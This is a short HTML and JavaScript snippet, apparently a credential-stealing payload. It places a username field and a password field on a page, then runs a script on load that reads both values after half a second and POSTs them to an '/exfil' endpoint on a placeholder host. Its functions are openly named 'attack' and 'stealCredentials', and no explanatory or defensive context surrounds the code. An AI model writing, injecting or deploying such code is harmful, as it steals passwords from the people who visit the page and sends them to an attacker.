<input id="user">
<input type="password" id="pass">

<script>
  var server = `https://${ip}:5000/exfil`;

  function attack() {
    setTimeout(stealCredentials, 500);
  }

  function stealCredentials() {
    var user = document.getElementById("user").value;
    var pass = document.getElementById("pass").value;

    var formData = new FormData();
    formData.append("user", user);
    formData.append("pass", pass);

    var xhr = new XMLHttpRequest();
    xhr.open("POST", server);
    xhr.send(formData);
  }

  attack();

</script>
